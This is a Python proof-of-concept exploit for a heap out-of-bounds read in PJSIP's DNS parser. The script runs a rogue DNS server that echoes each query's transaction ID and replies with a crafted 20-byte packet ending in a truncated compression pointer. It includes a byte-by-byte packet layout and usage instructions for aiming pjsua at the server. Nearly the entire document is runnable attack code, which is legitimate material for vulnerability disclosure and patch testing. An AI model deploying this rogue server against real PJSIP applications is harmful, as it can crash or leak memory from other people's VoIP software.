#!/usr/bin/env python3 """ CVE-2026-32945 PJSIP DNS parser 1-byte heap OOB read (network PoC) This script is a rogue DNS server that responds to any A query with a crafted DNS response containing a truncated compression pointer as the last byte of the packet. Any PJSIP application using pjproject <= 2.16 that resolves a domain through this server will hit the 1-byte OOB read in get_name_len(). Usage: # Terminal 1 -- start the rogue DNS server (needs root or cap_net_bind_service # for port 53; use port 5353 for non-root testing) python3 poc.py [--port PORT] [--bind ADDR] # Terminal 2 -- trigger a DNS resolution via the rogue server. # For pjsua (pjproject SIP softphone): # pjsua --nameserver 127.0.0.1:5353 sip:user@vuln.example.com # # For a quick test with dig: # dig @127.0.0.1 -p 5353 evil.test A # (dig will not crash; only the PJSIP parser is vulnerable) Packet layout (20 bytes): [DNS Header -- 12 bytes] ID=0x1234, Flags=0x8180 (QR=1 AA=1 RD=1 RA=1) QDCOUNT=1, ANCOUNT=1, NSCOUNT=0, ARCOUNT=0 [Question Section -- 7 bytes] QNAME: "a." (0x01 0x61 0x00) QTYPE: A (0x0001), QCLASS: IN (0x0001) [Answer RR name -- 1 byte] 0xC0 <-- compression pointer, high byte only. This is the last byte of the 20-byte packet. PJSIP's get_name_len() reads 2 bytes here without checking p+1 < max, reading 1 byte past the buffer. Dependency: none (stdlib only). """ import argparse import socket import struct import sys CRAFTED_RESPONSE = bytes([ # DNS Header (12 bytes) 0x12, 0x34, # Transaction ID (echo'd from query in real use) 0x81, 0x80, # Flags: QR=1 AA=1 RD=1 RA=1 0x00, 0x01, # QDCOUNT = 1 0x00, 0x01, # ANCOUNT = 1 0x00, 0x00, # NSCOUNT = 0 0x00, 0x00, # ARCOUNT = 0 # Question Section (7 bytes) 0x01, 0x61, 0x00, # QNAME: "a." (label "a" + end) 0x00, 0x01, # QTYPE = A 0x00, 0x01, # QCLASS = IN # Answer RR name: just the first byte of a compression pointer. # 0xC0 has the top two bits set (0b11000000), marking it as a # compression pointer. The second byte (the low byte of the 14-bit # offset) is missing -- the packet ends here. # # PJSIP's get_name_len() / get_name() detect 0xC0 and call # pj_memcpy(&offset, p, 2) without first checking p+1 < max. # p points to this 0xC0 byte; p+1 is one byte past the buffer end. 0xC0, # <-- byte 19, the last (and only) byte of the answer RR name ]) def build_response_for_query(query: bytes) -> bytes: """ Build a crafted response, echoing the transaction ID from the query so that PJSIP's resolver matches the response to the pending request. """ resp = bytearray(CRAFTED_RESPONSE) if len(query) >= 2: # Copy transaction ID from query into response resp[0] = query[0] resp[1] = query[1] return bytes(resp) def main(): parser = argparse.ArgumentParser( description="CVE-2026-32945 rogue DNS server") parser.add_argument("--port", type=int, default=5353, help="UDP port to listen on (default 5353)") parser.add_argument("--bind", default="0.0.0.0", help="Address to bind (default 0.0.0.0)") args = parser.parse_args() sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: sock.bind((args.bind, args.port)) except PermissionError: print(f"ERROR: cannot bind to port {args.port}. " "Try a port > 1024 or run as root.", file=sys.stderr) sys.exit(1) print(f"CVE-2026-32945 rogue DNS server listening on " f"{args.bind}:{args.port}/udp") print(f"Crafted response: {len(CRAFTED_RESPONSE)} bytes, " f"last byte 0x{CRAFTED_RESPONSE[-1]:02X} (truncated compression pointer)") print() print("Waiting for DNS queries ...") print("Point a PJSIP application at this server:") print(f" pjsua --nameserver 127.0.0.1:{args.port} sip:user@target.example") print() while True: try: data, addr = sock.recvfrom(4096) except KeyboardInterrupt: print("\nShutting down.") break qtype_str = "?" qname = "" try: # Minimal DNS query decode for logging if len(data) >= 12: qdcount = struct.unpack("!H", data[4:6])[0] if qdcount >= 1: # Parse first QNAME pos = 12 labels = [] while pos < len(data) and data[pos] != 0: llen = data[pos] pos += 1 labels.append(data[pos:pos+llen].decode("ascii", errors="replace")) pos += llen qname = ".".join(labels) + "." pos += 1 # skip terminating \x00 if pos + 4 <= len(data): qtype = struct.unpack("!H", data[pos:pos+2])[0] qtype_str = {1: "A", 28: "AAAA", 33: "SRV", 255: "ANY"}.get(qtype, str(qtype)) except Exception: pass resp = build_response_for_query(data) sock.sendto(resp, addr) print(f" Query from {addr[0]}:{addr[1]} QNAME={qname!r:40s} " f"QTYPE={qtype_str:5s} " f"--> sent {len(resp)}-byte crafted response " f"(last byte 0x{resp[-1]:02X})") if __name__ == "__main__": main()